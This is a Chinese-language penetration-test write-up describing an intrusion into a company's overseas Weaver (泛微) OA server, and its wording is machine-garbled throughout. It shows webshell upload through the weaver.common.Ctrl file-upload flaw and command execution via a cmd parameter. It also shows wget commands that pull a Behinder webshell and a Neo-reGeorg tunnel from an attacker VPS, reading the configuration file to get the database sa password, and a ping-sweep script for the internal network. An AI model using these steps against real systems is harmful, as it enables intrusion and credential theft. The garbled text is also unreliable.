0x01 信息网络 前期进行干系的信息网络事情,创造主站的防护很严格,爆破被锁,批量测试工具会被ban ip,难度很大心态有点崩。
子域名列举,访问后创造是一个业务系统,IP定位是某外洋IP。原来该公司有外洋业务,终于找到了一个相对的边缘资产。访问该系统的网站主页,对登录框进行测试: 抓登录包进行测试,随便输入账号密码之后提示License提交页面:测试文件上传功能点:创造cookie头中包含ecology_JSession字段名,验证该指纹是泛微OA运用。
0x02 web打点 用泛微OA的EXP进行测试干系漏洞:
测试出泛微OA weaver.common.Ctrl任意文件上传漏洞,上传了一句话jsp。
手工测试该一句话jsp:http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=whoami创造可以进行命令实行,目标系统为linux。
判断目标机器是否出网:目标机器考试测验ping 我的VPS:VPS上监听80端口,目标机器考试测验与80端口通信。创造目标机器可以与我的VPS通信。
0x03 建立据点
1、考试测验利用webshell管理目标: 天生冰蝎的jsp webshell,考试测验将冰蝎马落到目标机器上。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wgethttp://X.X.X.X
(1) 确定网站的绝对路径: 绝对路径为:/data/bdip/weaver/ecology/
(2) VSP启临时web做事发布webshell,目标机器实行下载命令: 确认冰蝎马落到目标机器的网站绝对路径下
。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwdhttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp利用冰蝎连接对应的webshell,连接成功:
2、利用http_tunnel管理目标
(1) 利用Neo-reGeorg工具天生http tunnel的jsp: python3 neoreg.py generate -k xxxx
(2) 下载tunnel.jsp马到目标机器上: 确认tunnel.jsp文件落到目标机器根目录上。
(3) 在VPS上连接http tunnel jsp: http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsppython3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001
(4) 通过proxychains代理工具测试验证访问目标内网:
0x04 当前落脚点机器信息网络
1、探求泛微OA连接数据库配置文件:
2、查看连接数据库的配置文件: 创造是MSSQL数据库,且数据库做事在本地开启。
3、查看数据库中的数据: 拿到sa用户的密码利用冰蝎去连接数据库,可以看到对应库中的数据:
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.propertieshttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties
0x05 内网信息网络 1、查看当前机器的IP及同网段的主机IP:
2、探测当前网段存活主机:由于socks5代理无法代理ping流量。因此在VPS上准备一个ping.sh脚本,临时开启http做事。#!/bin/bashfor i in {1..254} do
ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null
if [ $? -eq 0 ];then
echo "X.X.X.$i is up" else
echo "X.X.X.$i is down"
fidone目标机器主动将ping.sh脚本下载到/opt目录下:
给ping.sh脚本授予可实行权限:
运行ping.sh脚本将探活结果写到文件里:查看扫描结果除了落脚点这台机器,竟然当前网段只有1台机器存活。
存活机器大概率是网关,没有其他可以横向移动的机器了。
查了下hosts文件创造是云某云主机,结束
首发tools by geo
